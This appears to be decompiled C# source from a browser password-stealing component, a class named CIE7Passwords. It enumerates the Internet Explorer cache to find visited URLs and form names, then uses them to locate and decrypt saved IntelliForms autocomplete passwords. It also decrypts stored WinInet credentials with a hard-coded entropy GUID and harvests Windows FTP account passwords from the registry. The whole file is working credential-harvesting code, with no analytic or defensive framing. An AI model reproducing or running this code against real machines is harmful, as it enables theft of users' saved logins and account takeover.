// Token: 0x0600010E RID: 270 RVA: 0x00002F24 File Offset: 0x00001124
private void AddPasswdInfo(string strRess, int hKey)
{
strRess = Strings.LCase(strRess);
byte[] bytes = Encoding.Unicode.GetBytes(strRess);
string text = this.GetSHA1Hash(ref bytes);
text += Strings.Right("00" + Conversion.Hex(this.CheckSum(ref text)), 2);
int num2;
int num3;
int num = CIE7Passwords.RegQueryValueEx(hKey, ref text, 0, ref num2, IntPtr.Zero, ref num3);
if (num3 > 0)
{
IntPtr intPtr = Marshal.AllocHGlobal(num3);
num = CIE7Passwords.RegQueryValueEx(hKey, ref text, 0, ref num2, intPtr, ref num3);
CIE7Passwords.DATA_BLOB data_BLOB;
data_BLOB.cbData = num3;
data_BLOB.pbData = intPtr;
CIE7Passwords.DATA_BLOB data_BLOB2;
data_BLOB2.cbData = checked (Strings.Len(strRess) * 2 + 2);
data_BLOB2.pbData = Marshal.StringToHGlobalUni(strRess);
CIE7Passwords.DATA_BLOB dataOut;
CIE7Passwords.CryptUnprotectData(ref data_BLOB, IntPtr.Zero, ref data_BLOB2, IntPtr.Zero, IntPtr.Zero, 0, ref dataOut);
this.ProcessIEPass(strRess, text, dataOut);
Marshal.FreeHGlobal(data_BLOB2.pbData);
CIE7Passwords.LocalFree(dataOut.pbData);
}
}
// Token: 0x0600010F RID: 271 RVA: 0x00003018 File Offset: 0x00001218
public void Delete(string szResourceName)
{
int hKey = -2147483647;
string text = "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2";
int hKey2;
CIE7Passwords.RegOpenKeyEx(hKey, ref text, 0, 131078, ref hKey2);
int num = CIE7Passwords.RegDeleteValue(hKey2, ref szResourceName);
CIE7Passwords.RegCloseKey(hKey2);
CIE7Passwords.CredDelete(szResourceName, 1, 0);
}
// Token: 0x06000110 RID: 272 RVA: 0x0000305C File Offset: 0x0000125C
public void Refresh()
{
Regex regex = new Regex("name=\"([^\"]+)\"", RegexOptions.Compiled);
this.m_IEPass.Clear();
int hKey = -2147483647;
string text = "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage1";
int num;
CIE7Passwords.RegOpenKeyEx(hKey, ref text, 0, 131097, ref num);
int hKey2 = -2147483647;
text = "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2";
int num2;
CIE7Passwords.RegOpenKeyEx(hKey2, ref text, 0, 131097, ref num2);
checked
{
if (num2 != 0 || num != 0)
{
text = null;
int num4;
int num3 = CIE7Passwords.FindFirstUrlCacheEntry(ref text, IntPtr.Zero, ref num4);
if (num4 > 0)
{
IntPtr intPtr = Marshal.AllocHGlobal(num4);
Marshal.WriteInt32(intPtr, num4);
text = null;
num3 = CIE7Passwords.FindFirstUrlCacheEntry(ref text, intPtr, ref num4);
do
{
CIE7Passwords.INTERNET_CACHE_ENTRY_INFO internet_CACHE_ENTRY_INFO;
object obj = Marshal.PtrToStructure(intPtr, internet_CACHE_ENTRY_INFO.GetType());
CIE7Passwords.INTERNET_CACHE_ENTRY_INFO internet_CACHE_ENTRY_INFO2;
internet_CACHE_ENTRY_INFO = ((obj != null) ? ((CIE7Passwords.INTERNET_CACHE_ENTRY_INFO)obj) : internet_CACHE_ENTRY_INFO2);
if ((internet_CACHE_ENTRY_INFO.CacheEntryType & 2097153) != 0)
{
string text2 = this.GetStrFromPtrA(internet_CACHE_ENTRY_INFO.lpszSourceUrlName);
if (text2.IndexOf("?") >= 0)
{
text2 = text2.Substring(0, text2.IndexOf("?"));
}
if (Strings.InStr(text2, "@", CompareMethod.Binary) > 0)
{
text2 = Strings.Mid(text2, Strings.InStr(text2, "@", CompareMethod.Binary) + 1);
}
if (num != 0 && (internet_CACHE_ENTRY_INFO.CacheEntryType & 1) == 1)
{
string strFromPtrA = this.GetStrFromPtrA(internet_CACHE_ENTRY_INFO.lpHeaderInfo);
string strFromPtrA2 = this.GetStrFromPtrA(internet_CACHE_ENTRY_INFO.lpszLocalFileName);
if (string.IsNullOrEmpty(strFromPtrA) || !strFromPtrA.Contains("text/html"))
{
if (string.IsNullOrEmpty(strFromPtrA2))
{
goto IL_1F3;
}
}
try
{
try
{
foreach (object obj2 in regex.Matches(File.ReadAllText(strFromPtrA2)))
{
Match match = (Match)obj2;
this.AddPasswdInfo(match.Groups[1].Value, num);
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
{
(enumerator as IDisposable).Dispose();
}
}
}
catch (Exception ex)
{
}
}
IL_1F3:
this.AddPasswdInfo(text2, num);
this.AddPasswdInfo(text2, num2);
}
num4 = 0;
CIE7Passwords.FindNextUrlCacheEntry(num3, IntPtr.Zero, ref num4);
Marshal.FreeHGlobal(intPtr);
if (num4 > 0)
{
intPtr = Marshal.AllocHGlobal(num4);
Marshal.WriteInt32(intPtr, num4);
}
}while (CIE7Passwords.FindNextUrlCacheEntry(num3, intPtr, ref num4) != 0);
CIE7Passwords.FindCloseUrlCache(num3);
}
CIE7Passwords.RegCloseKey(num);
CIE7Passwords.RegCloseKey(num2);
}
string lpszFilter = "Microsoft_WinInet_*";
int num5;
int num6;
CIE7Passwords.CredEnumerate(lpszFilter, 0, ref num5, ref num6);
short[] array = new short[37];
CIE7Passwords.DATA_BLOB data_BLOB;
CIE7Passwords.DATA_BLOB data_BLOB2;
CIE7Passwords.DATA_BLOB data_BLOB3;
if (num5 > 0)
{
int num7 = 0;
int num8 = num5 - 1;
for (int i = num7; i <= num8; i++)
{
IntPtr ptr = new IntPtr(num6 + i * 4);
IntPtr intPtr = Marshal.ReadIntPtr(ptr);
CIE7Passwords.CREDENTIAL credential;
object obj3 = Marshal.PtrToStructure(intPtr, credential.GetType());
CIE7Passwords.CREDENTIAL credential2;
credential = ((obj3 != null) ? ((CIE7Passwords.CREDENTIAL)obj3) : credential2);
string text3 = this.CopyString(credential.lpstrTargetName);
data_BLOB.cbData = 74;
intPtr = Marshal.AllocHGlobal(74);
string str = "abe2869f-9b47-4cd9-a358-c22904dba7f7\0";
int num9 = 0;
do
{
Marshal.WriteInt16(intPtr, num9 * 2, (short)(Strings.Asc(Strings.Mid(str, num9 + 1, 1)) * 4));
num9++;
}while (num9 <= 36);
data_BLOB.pbData = intPtr;
data_BLOB2.pbData = credential.lpbCredentialBlob;
data_BLOB2.cbData = credential.dwCredentialBlobSize;
data_BLOB3.cbData = 0;
data_BLOB3.pbData = IntPtr.Zero;
CIE7Passwords.CryptUnprotectData(ref data_BLOB2, IntPtr.Zero, ref data_BLOB, IntPtr.Zero, IntPtr.Zero, 0, ref data_BLOB3);
Marshal.FreeHGlobal(intPtr);
string expression = Marshal.PtrToStringUni(data_BLOB3.pbData);
string[] array2 = Strings.Split(expression, ":", -1, CompareMethod.Binary);
int num10 = Strings.InStr(Strings.Mid(text3, 19), "/", CompareMethod.Binary);
if (num10 > 0)
{
this.m_IEPass.Add(new CIE7Password(text3, Strings.Mid(text3, 19, num10 - 1), array2[0], array2[1], DateTime.MinValue, 2, Strings.Mid(text3, 19 + num10)));
}
else
{
this.m_IEPass.Add(new CIE7Password(text3, Strings.Mid(text3, 19), array2[0], array2[1], DateTime.MinValue, 2, string.Empty));
}
CIE7Passwords.LocalFree(data_BLOB3.pbData);
}
}
CIE7Passwords.CredFree(num6);
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\FTP\\Accounts");
if (registryKey != null)
{
foreach (string text4 in registryKey.GetSubKeyNames())
{
RegistryKey registryKey2 = registryKey.OpenSubKey(text4);
foreach (string text5 in registryKey2.GetSubKeyNames())
{
RegistryKey registryKey3 = registryKey2.OpenSubKey(text5);
byte[] array3 = (byte[])registryKey3.GetValue("Password");
byte[] array4 = new byte[4];
int num11 = 0;
int num12 = text4.Length - 1;
for (int l = num11; l <= num12; l++)
{
byte b = (byte)(text4[l] & '\u001f');
array4[l & 3] = unchecked (array4[l & 3] + b);
}
data_BLOB2.cbData = array3.Length;
data_BLOB2.pbData = Marshal.AllocHGlobal(array3.Length);
Marshal.Copy(array3, 0, data_BLOB2.pbData, array3.Length);
data_BLOB3.cbData = 0;
data_BLOB3.pbData = IntPtr.Zero;
GCHandle gchandle = GCHandle.Alloc(array4, GCHandleType.Pinned);
data_BLOB.pbData = gchandle.AddrOfPinnedObject();
data_BLOB.cbData = 4;
CIE7Passwords.CryptUnprotectData(ref data_BLOB2, IntPtr.Zero, ref data_BLOB, IntPtr.Zero, IntPtr.Zero, 0, ref data_BLOB3);
gchandle.Free();
this.m_IEPass.Add(new CIE7Password(text4, string.Format("ftp://{0}@{1}/", text4, text5), text5, Marshal.PtrToStringUni(data_BLOB3.pbData), DateTime.MinValue, 3, string.Empty));
CIE7Passwords.LocalFree(data_BLOB3.pbData);
}
}
}
}
}
// Token: 0x0600010D RID: 269 RVA: 0x00002B68 File Offset: 0x00000D68
private void ProcessIEPass(string strURL, string strHash, CIE7Passwords.DATA_BLOB dataOut)
{
CIE7Passwords.StringIndexEntry stringIndexEntry;
int num = Strings.Len(stringIndexEntry);
CIE7Passwords.StringIndexHeader stringIndexHeader;
int num2 = Strings.Len(stringIndexHeader);
checked
{
IntPtr ptr = new IntPtr(dataOut.pbData.ToInt64() + (long)(unchecked ((ulong)Marshal.ReadByte(dataOut.pbData))));
object obj = Marshal.PtrToStructure(ptr, stringIndexHeader.GetType());
CIE7Passwords.StringIndexHeader stringIndexHeader2;
stringIndexHeader = ((obj != null) ? ((CIE7Passwords.StringIndexHeader)obj) : stringIndexHeader2);
if (stringIndexHeader.dwType == 1)
{
if (stringIndexHeader.dwEntriesCount >= 2)
{
IntPtr intPtr = new IntPtr(ptr.ToInt32() + stringIndexHeader.dwStructSize);
IntPtr value = new IntPtr(intPtr.ToInt32() + stringIndexHeader.dwEntriesCount * num);
int num3 = 0;
int num4 = stringIndexHeader.dwEntriesCount - 1;
for (int i = num3; i <= num4; i += 2)
{
if (value == IntPtr.Zero | intPtr == IntPtr.Zero)
{
break;
}
object obj2 = Marshal.PtrToStructure(intPtr, stringIndexEntry.GetType());
CIE7Passwords.StringIndexEntry stringIndexEntry2;
stringIndexEntry = ((obj2 != null) ? ((CIE7Passwords.StringIndexEntry)obj2) : stringIndexEntry2);
IntPtr intPtr2 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset);
IntPtr intPtr3;
string szUserName;
if (CIE7Passwords.lstrlenA(intPtr2) != stringIndexEntry.dwDataSize)
{
intPtr3 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset);
szUserName = Marshal.PtrToStringUni(intPtr3);
}
else
{
intPtr3 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset);
szUserName = Marshal.PtrToStringAnsi(intPtr3);
}
intPtr = new IntPtr(intPtr.ToInt32() + num);
object obj3 = Marshal.PtrToStructure(intPtr, stringIndexEntry.GetType());
stringIndexEntry = ((obj3 != null) ? ((CIE7Passwords.StringIndexEntry)obj3) : stringIndexEntry2);
string szPasswd = Strings.Space(stringIndexEntry.dwDataSize);
intPtr3 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset);
if (CIE7Passwords.lstrlenA(intPtr3) != stringIndexEntry.dwDataSize)
{
intPtr2 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset);
szPasswd = Marshal.PtrToStringUni(intPtr2);
}
else
{
intPtr3 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset);
szPasswd = Marshal.PtrToStringAnsi(intPtr3);
}
intPtr = new IntPtr(intPtr.ToInt32() + num);
this.m_IEPass.Add(new CIE7Password(strHash, strURL, szUserName, szPasswd, this.FileTimeToDate(ref stringIndexEntry.ftInsertDateTime), 1, string.Empty));
}
}
}
else if (stringIndexHeader.dwType == 0)
{
IntPtr intPtr = new IntPtr(ptr.ToInt32() + stringIndexHeader.dwStructSize);
IntPtr value = new IntPtr(intPtr.ToInt32() + stringIndexHeader.dwEntriesCount * num);
if (!(value == IntPtr.Zero | intPtr == IntPtr.Zero))
{
int num5 = 0;
int num6 = stringIndexHeader.dwEntriesCount - 1;
for (int j = num5; j <= num6; j++)
{
object obj4 = Marshal.PtrToStructure(intPtr, stringIndexEntry.GetType());
CIE7Passwords.StringIndexEntry stringIndexEntry2;
stringIndexEntry = ((obj4 != null) ? ((CIE7Passwords.StringIndexEntry)obj4) : stringIndexEntry2);
string szUserName = Strings.Space(stringIndexEntry.dwDataSize);
IntPtr intPtr3 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset);
if (CIE7Passwords.lstrlenA(intPtr3) != stringIndexEntry.dwDataSize)
{
IntPtr intPtr2 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset);
szUserName = Marshal.PtrToStringUni(intPtr2);
}
else
{
intPtr3 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset);
szUserName = Marshal.PtrToStringAnsi(intPtr3);
}
intPtr = new IntPtr(intPtr.ToInt32() + num);
this.m_IEPass.Add(new CIE7Password(strHash, strURL, szUserName, string.Empty, this.FileTimeToDate(ref stringIndexEntry.ftInsertDateTime), 0, string.Empty));
}
}
}
}
}
